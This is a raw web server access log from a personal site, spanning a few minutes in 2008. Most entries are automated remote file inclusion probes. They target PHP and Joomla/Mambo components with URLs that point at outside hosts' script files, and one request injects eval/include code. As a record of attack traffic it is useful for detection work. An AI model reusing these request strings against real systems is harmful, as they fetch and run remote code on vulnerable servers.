205.234.198.174 - - [22/Sep/2008:10:02:15 -0700] "GET /logs/index.php?view=page&pagename=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:02:15 -0700] "GET /logs/access_080907.log/index.php?view=page&pagename=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:02:16 -0700] "GET /index.php?view=page&pagename=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 200 8041 "-" "libwww-perl/5.810" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:10:02:30 -0700] "GET /logs/access_080707.log%20/home.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:02:36 -0700] "GET /logs/access_080617.log/index.php?view=page&pagename=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:02:43 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
142.150.98.171 - - [22/Sep/2008:10:03:01 -0700] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
142.150.98.171 - - [22/Sep/2008:10:03:02 -0700] "GET /logs//?path%5Bdocroot%5D=http://chebugis.net/chid.txt??? HTTP/1.1" 200 66168 "-" "libwww-perl/5.79" "www.dmulk.com"
142.150.98.171 - - [22/Sep/2008:10:03:03 -0700] "GET //?path%5Bdocroot%5D=http://chebugis.net/chid.txt??? HTTP/1.1" 200 94724 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [22/Sep/2008:10:03:07 -0700] "GET /logs/access_080304.log//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://growlibear.com//amember/plugins/payment/secpay/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.37 - - [22/Sep/2008:10:03:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.37 - - [22/Sep/2008:10:03:18 -0700] "GET /bikes/GPS/WeSTOC2008/ HTTP/1.1" 200 858 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
142.150.98.171 - - [22/Sep/2008:10:03:23 -0700] "GET /logs/access_080502.log//?path%5Bdocroot%5D=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:03:25 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
116.125.113.115 - - [22/Sep/2008:10:03:26 -0700] "GET /logs//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://growlibear.com//amember/plugins/payment/secpay/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:03:27 -0700] "GET ///vwar/backup/errors.php?error=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:03:29 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:10:03:33 -0700] "GET /logs/index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:10:03:34 -0700] "GET /index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 94948 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:10:03:42 -0700] "GET /logs/index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.fotohead.nl/admin/bo.do? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:10:03:43 -0700] "GET /index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.fotohead.nl/admin/bo.do? HTTP/1.1" 200 95018 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:10:03:53 -0700] "GET /logs/index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:10:03:58 -0700] "GET /index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 200 94966 "-" "libwww-perl/5.805" "www.dmulk.com"
208.80.194.34 - - [22/Sep/2008:10:04:01 -0700] "GET / HTTP/1.0" 200 94260 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Media Center PC 4.0; PeoplePal 3.0; MEGAUPLOAD 1.0)" "dmulk.com"
71.160.206.87 - - [22/Sep/2008:10:04:02 -0700] "GET /bikes/dteel/2008_09_21/Rides418s.jpg HTTP/1.1" 200 238378 "http://www.st-owners.com/forums/showthread.php?t=42795&page=22" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
71.165.227.47 - - [22/Sep/2008:10:04:03 -0700] "GET /bikes/dteel/2008_09_21/Rides413s.jpg HTTP/1.1" 200 313821 "http://www.st-owners.com/forums/showthread.php?t=42795&page=22" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:10:04:04 -0700] "GET /logs/access_080525.log/index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:10:04:04 -0700] "GET /logs/access_080522.log/index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:04:20 -0700] "GET /logs/access_080830.log/head.php?adresa=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:10:04:21 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:10:04:35 -0700] "GET /logs/access_080228.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:10:04:35 -0700] "GET /logs/access.log%20/index2.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:10:05:01 -0700] "GET /logs/access_080717.log/home.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.34 - - [22/Sep/2008:10:05:17 -0700] "GET /logs/view.php?sub=http://www.gter.biz/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.17.56.34 - - [22/Sep/2008:10:05:17 -0700] "GET /view.php?sub=http://www.gter.biz/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:05:18 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:05:18 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:05:18 -0700] "GET /logs/access_071212.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.74.198.93 - - [22/Sep/2008:10:05:22 -0700] "GET /logs/access_080903.log//atom.php5?page=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:10:05:24 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:10:05:25 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 200 95155 "-" "libwww-perl/5.805" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:05:34 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:05:34 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:05:34 -0700] "GET /logs/access_080307.log//claroline/phpbb/page_tail.php?includePath=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:05:52 -0700] "GET /logs/access_071213.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:06:09 -0700] "GET /logs/access_080816.log//modules/vwar/admin/admin.php?vwar_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:06:10 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:06:19 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.15.54 - - [22/Sep/2008:10:06:27 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [22/Sep/2008:10:06:28 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:06:37 -0700] "GET /logs/access_080816.log//modules/vwar/admin/admin.php?vwar_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:06:37 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:06:37 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:06:38 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:06:38 -0700] "GET ///vwar/backup/errors.php?error=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:06:38 -0700] "GET /logs///vwar/backup/errors.php?error=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:06:55 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.27.13.218 - - [22/Sep/2008:10:07:02 -0700] "GET /logs/access_080709.log HTTP/1.1" 200 1245184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:10:07:05 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:10:07:11 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:10:07:12 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:07:15 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
12.21.204.78 - - [22/Sep/2008:10:07:43 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.21.204.78 - - [22/Sep/2008:10:07:43 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:07:45 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:07:45 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:07:55 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:07:55 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:07:55 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:08:06 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:08:10 -0700] "GET /logs/access_071212.log%20//language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:08:13 -0700] "GET /logs/access_080704.log%20//language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:08:16 -0700] "GET /logs/access_080327.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:08:16 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:08:16 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
65.55.241.211 - - [22/Sep/2008:10:08:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Microsoft compass/1.0" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:08:21 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:08:22 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
65.55.241.211 - - [22/Sep/2008:10:08:23 -0700] "GET /bikes/GPS/WeSTOC2008/dmulk_WeSTOC08.gpx HTTP/1.1" 200 3722817 "-" "Microsoft compass/1.0" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:08:46 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:08:47 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:08:50 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:09:20 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.34 - - [22/Sep/2008:10:09:43 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.42 - - [22/Sep/2008:10:09:43 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:10:12 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:10:12 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:10:12 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:10:10:13 -0700] "GET /!rfihttp://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:10:10:13 -0700] "GET /logs/access_080730.log/!rfihttp://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:10:10:13 -0700] "GET /logs/!rfihttp://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:10:10:13 -0700] "GET /logs/access_080809.log/!rfihttp://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:10:43 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:10:43 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:10:43 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:10:45 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:10:45 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:10:45 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.245.166.92 - - [22/Sep/2008:10:10:46 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:10:49 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:10:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:10:50 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.9.28 - - [22/Sep/2008:10:10:52 -0700] "GET /logs/errors.php?error=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.9.28 - - [22/Sep/2008:10:10:53 -0700] "GET /errors.php?error=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.153.170.106 - - [22/Sep/2008:10:11:07 -0700] "HEAD /logs/access_071214.log HTTP/1.1" 200 0 "-" "Mozilla/4.5 [en] (Win98; I)" "www.dmulk.com"
86.153.170.106 - - [22/Sep/2008:10:11:08 -0700] "HEAD /logs/access_071106.log HTTP/1.1" 200 0 "-" "Mozilla/4.5 [en] (Win98; I)" "www.dmulk.com"
86.153.170.106 - - [22/Sep/2008:10:11:08 -0700] "HEAD /logs/access_080630.log HTTP/1.1" 200 0 "-" "Mozilla/4.5 [en] (Win98; I)" "www.dmulk.com"
